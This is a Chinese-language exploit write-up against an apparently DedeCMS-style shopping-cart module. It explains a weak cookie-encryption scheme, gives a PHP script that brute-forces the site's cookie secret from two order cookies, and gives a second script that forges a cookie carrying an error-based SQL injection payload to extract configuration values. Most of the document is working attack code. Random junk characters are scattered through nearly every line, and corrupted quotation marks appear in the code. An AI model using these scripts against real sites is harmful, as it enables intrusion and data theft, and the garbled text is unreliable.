www.xxx.com/plus/search.php?keyword=
3 V; q% ?. R: ?6 L) a0 J6 ]在 include/shopcar.class.php中 M9 A( ?+ S5 B
先看一下这个shopcar类是如何生成cookie的
4 B& t2 r5 T! q. f C239 function saveCookie($key,$value)
0 a" d$ G3 Q/ z' m5 O8 c! c240 {
. D. z" I2 Y1 X3 f7 P; E, p3 T241 if(is_array($value))
. @; S/ K5 u d) [242 {+ \# \1 i/ t; _. O4 g- }" C `
243 $value = $this->enCrypt($this->enCode($value));
; l' y% R J' p# h. D$ o6 V244 }
9 G8 W/ z0 h1 b" p9 \4 o245 else) Z- ]2 p5 M" J$ [
246 {/ |% l$ E, q6 X3 J) o
247 $value = $this->enCrypt($value);/ @7 I2 ]3 l; L! f6 w
248 }
' L- z/ y+ ^. u4 i249 setcookie($key,$value,time()+36000,’/');
6 w( J% d% _# T9 ]: Y250 }
0 v9 m7 D( M9 f5 L简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
$ ]6 j# O; b+ q& I4 ]! C; [186 function enCrypt($txt)
0 U) y/ u+ R# p8 p% B7 _7 a$ l187 {" O8 `* N, \/ _$ J# c
188 srand((double)microtime() * 1000000);- w$ K- X/ h7 F: ^* T# R
189 $encrypt_key = md5(rand(0, 32000));" v1 S6 `& I3 _$ [8 O- A" ~3 f) c! Q) E
190 $ctr = 0;9 q/ P* S. x. ]5 @, T" |' Y
191 $tmp = ”;
) i7 x: d$ x9 X' m) Y# w' O5 c192 for($i = 0; $i < strlen($txt); $i++)4 t* H+ q4 P# _
193 {
& x2 X- R# z0 V' ^, t+ C194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
k4 i% S' N9 b% Z3 n9 P( T195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);0 p) U8 p) N( N7 J
196 }
% {+ w7 G& b' D; c' h0 K+ }197 return base64_encode($this->setKey($tmp));
" Q' }) G& x' L! l3 p$ w X198 }9 l; r3 c. v& i6 m6 D) x
213 function setKey($txt)
8 ~, A2 ?/ k6 b& m214 {, |- l, Z5 l% L1 I# K& }
215 global $cfg_cookie_encode;% N$ Y p O/ {8 e& p9 `
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
4 M3 ^8 l* G3 |+ c; T. o217 $ctr = 0;
( [% u; P; m t) D218 $tmp = ”;: c' a/ S& \: ?# m! u
219 for($i = 0; $i < strlen($txt); $i++)$ |$ p0 q- e; L3 U; K
220 {% L6 _9 e3 k3 p: c2 W
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) s7 m1 }2 g, X* a$ J9 J, ^1 j222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; y$ m2 x+ \0 h* a2 a5 p
223 }$ d. ~! j8 H. |" z' f/ T
224 return $tmp;
g1 \" A6 ~9 [# l4 x+ ^, G* D* m225 }" f$ N6 z J5 a
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
# R% R1 y; P, q. [然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。% T$ w0 P; i6 f/ ~' ^% V
具体代码如下:& q1 F4 w, l3 h( K. c k3 o
<?php
) m% ]1 ]- D( y/ f# } F1 _! u" m$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here! q, Z% Y/ l1 r0 [0 |
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
" [1 g! N+ s5 \" ~1 `0 ^% p" m: T$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here! U8 h& T& j4 L4 r# [% w
function reStrCode($code,$string)& r& G9 j* N) V# U _/ c
{% J' J |& W' S/ e
$code = base64_decode($code);6 E7 T9 z! P8 _5 `0 T! X6 }
$key = “”;1 }6 R8 f1 Y1 y( x0 k$ }
for($i=0 ; $i<32 ; $i++)
z/ P! r& p9 X1 C) n{
) j$ G% x% F( y, V$key .= $string[$i] ^ $code[$i];5 o( P8 j8 G) l
}
. [' T3 k- {! E/ q kreturn $key;$ u# }1 [# s& h J. T
}
" R1 Y/ ]+ v1 |function getKeys($cookie,$plantxt)# E D% P; D8 A. \5 E4 y
{1 F$ ~; S# D" @8 c, O
$tmp = $cookie;
( D3 @( F9 O9 V/ ~- M- c$results = array();
. U9 L1 o$ M P( h& Mfor($j=0 ; $j < 32000; $j++)$ ]' M: v+ H1 Y/ [" y8 K/ y2 M# F; \
{
U% @. L! o& v" V+ b- D
2 o. ?. D, F+ ^- l$txt = $plantxt; [# ~) t" \: k& A x& p
$ctr = 0;$ `% f: W5 M7 Z- b" A. v! v
$tmp = ”;
; i5 @+ R7 i& W5 u! b$encrypt_key = md5($j);8 u' ^" I) @8 O3 |0 g2 m
for($i =0; $i < strlen($txt); $i ++)
' s$ F, D( e# b' @ A- y! O, i{( o3 n6 [: w$ d8 T. h/ F9 `
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( ~5 z1 J% H' O) e
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 J( N8 r9 W% D& }+ A}/ B9 s8 D! s$ m# Y6 |* F" [
$string = $tmp;
S: q `5 ]& l+ w! R$code = $cookie;5 ?. r4 G0 [4 O7 k$ b; X; E( v! H2 |, I
$result = reStrCode($code,$string);
. }6 P0 [2 B# F2 w0 Iif(eregi(‘^[a-z0-9]+$’,$result))1 g) m4 J# j; T4 Q% L4 i
{
; n( u" j) ^( y* [5 eecho $result.”\n”;( z7 R2 s, X) n1 _; P$ Y+ w
$results[] = $result;
2 g0 E2 @3 U2 U- F4 R! u v& o) n}$ i) t6 h: l0 e$ N0 G
}
! | p( e( K3 h9 J& e7 S! L1 Y# dreturn $results;
( p( J+ r: I) P+ P; {}
. `6 V6 Q5 C7 X. ]% A( Q8 k n6 f$results1 = getKeys($cookie1,$plantxt);1 B" g0 h1 F! P- U( d
$results2 = getKeys($cookie2,$plantxt);
: K# W% b4 Q7 t* {print “\n——————–real key————————–\n”;, k" |2 ?( ~0 k5 M! `: z) e
foreach($results1 as $test1)5 l! \( f# | O Z$ Q
{
- g ?9 w9 l' N% P. r, pforeach($results2 as $test2)
2 s p' H7 ]/ B5 f; c$ ?{
" y R# D0 [3 V& f/ @* ~8 s* z; qif($test1 == $test2)( @& J' {4 W& U% l. i
{
1 y! u0 \; U( C$ Iecho $test1.”\n”;8 m- a, ] N5 V' s# a' g" i0 r7 Z
}7 |! v+ ]: F5 N# P% w
}
/ o% N+ u2 \2 h8 g8 G) w3 t0 k}8 k0 l% t8 S' V+ p7 U' U$ ~
?>9 a4 ~1 W- ]2 ?( [' B$ A9 R
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
' K* E" Y9 d+ y/ lplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
, d: D/ {5 T# D. ]+ }5 W! W/ j; Q然后推算出md5(strtolower($cfg_cookie_encode))+ n0 m4 ^" z/ b# o/ y" l, X% P3 U
得到这个key之后,我们就可以构造任意购物车的cookie7 j8 e9 k( g* u" b& u5 U
接着看8 j$ i( S. t, u4 j8 y- [2 `
20 class MemberShops. _7 Y# R7 Q: X! S& F/ j
21 {, O7 v7 Z( [( {: u
22 var $OrdersId;; Y1 l, x! a* { p, ?! D+ F4 i) T
23 var $productsId;6 s9 y4 c1 y0 w( f
24
2 z+ ^. n1 L9 Q25 function __construct()
% h# \( `0 R1 L; U1 b26 {1 a' U+ m: o3 t+ d$ S4 E" G( _9 T
27 $this->OrdersId = $this->getCookie(“OrdersId”);- m: \9 f' l* t5 {: P& j
28 if(empty($this->OrdersId))
" K M' ^# z4 z4 H+ a8 a7 [29 {4 V3 X( a# v% u) M' K
30 $this->OrdersId = $this->MakeOrders();
* y' H: J7 S. ~. q) q: l31 }
4 O1 [' ?8 [2 Q7 f7 ~32 }! A% `+ l& \- k6 \" z3 F
发现OrderId是从cookie里面获取的8 B8 [, ] U* ?3 G
然后5 q- q7 p- n' Q
/plus/carbuyaction.php中的
' t9 X8 P5 U, _0 y% R+ M29 $cart = new MemberShops();
* e q! M S- z8 v' G1 ^3 y39 $OrdersId = $cart->OrdersId; //本次记录的订单号
1 f7 ~$ T& u3 K0 B……9 y9 U6 H7 T3 T
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
7 x- t8 z9 c' ^) d+ l+ s1 t# ]4 S; R接着我们就可以注入了3 d0 c w- c+ d# }7 g8 Q4 k( E
通过利用下面代码生成cookie:. w' C; d5 p1 y
<?php' U1 z( h2 l# e* Z, A Q) l+ ?
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
2 C# }1 B, O, A+ X G0 L$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
0 E( X/ @3 z2 Zfunction setKey($txt)' l2 ]" ?! m: Y! M, u6 q; [: X* O& j' b
{
! x4 u- ~" f( V8 X1 vglobal $encrypt_key;
- p. }* q1 a) h7 z% M% w" P' L' _$ctr = 0;
+ W1 r9 G% |0 p; g# Y' ^0 g$tmp = ”;5 p" z" R( r2 u1 |" o: z O; l4 k
for($i = 0; $i < strlen($txt); $i++)9 e7 Q3 o# A1 N1 `# ^8 P
{' \ ^2 P. h6 f% l( p
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' F# O/ D8 E+ d& R6 e: `( j$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];- v5 }( A8 j+ h5 ~' J, a
}
; m/ {- y' F7 Z% }return $tmp;. n; |8 \2 C. Y/ R) O6 i2 k' M. D
}) j: }2 H; B2 b5 ^/ L9 o @
function enCrypt($txt)
6 n/ ^6 W$ E N7 A{8 {& q6 m* z- L9 ?/ t: r
srand((double)microtime() * 1000000);
$ K# O. g3 u* X$ B$encrypt_key = md5(rand(0, 32000));7 R& j4 Y. I+ Q# q6 S
$ctr = 0;
2 E2 ?$ n- L9 \& A w$tmp = ”;) E0 `5 ?0 C) E' X1 O
for($i = 0; $i < strlen($txt); $i++)
1 S- X' X& s! G& A- ^# z{, X x) M9 h7 F3 B( V+ g( x
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" n5 r* p1 u0 f' k* u% @: ] S2 c" ^$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);! L# e3 \. q0 L+ U2 ?7 h* K, E3 \
}" S% v5 s. p. f" v4 J5 B
return base64_encode(setKey($tmp));
/ h( |4 J; Z1 M: x# w}
; a! Y+ c+ _3 R4 ofor($dest =0;$dest = enCrypt($txt);). k% w* Z/ q9 ~. @5 o+ m3 u) ^& D
{
5 K( f8 D+ ]( n4 b7 [: Xif(!strpos($dest,’+'))
6 m) I: L1 D5 V{% y6 C* q* v& }4 i7 @" o& r
break;3 w7 g8 V' ~) G2 f
}
% Y0 |( B- V/ U! v, U; G5 W}
' Q6 L0 E7 L+ eecho $dest.”\n”;7 l- n2 A7 n! a8 b
?>- y t7 e$ `( Q0 s& V4 L
; x5 _. h! i5 Z! G |